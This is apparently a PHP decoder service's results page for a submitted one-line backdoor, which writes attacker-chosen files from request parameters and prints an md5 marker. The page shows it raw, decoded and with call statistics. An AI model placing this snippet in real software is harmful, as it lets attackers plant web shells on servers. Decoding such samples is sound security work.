Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
___FINE___ <?php $r=$_REQUEST;@file_put_contents($r['js_name'],$r['js_body']);print(md5(9..
Decoded Output download
___FINE___
<?php $r=$_REQUEST;@file_put_contents($r['js_name'],$r['js_body']);print(md5(9));?>
Did this file decode correctly?
Original Code
___FINE___
<?php $r=$_REQUEST;@file_put_contents($r['js_name'],$r['js_body']);print(md5(9));?>
Function Calls
file_put_contents | 1 |
Stats
MD5 | 8780706675f862b56c3c057f5664baa4 |
Eval Count | 0 |
Decode Time | 121 ms |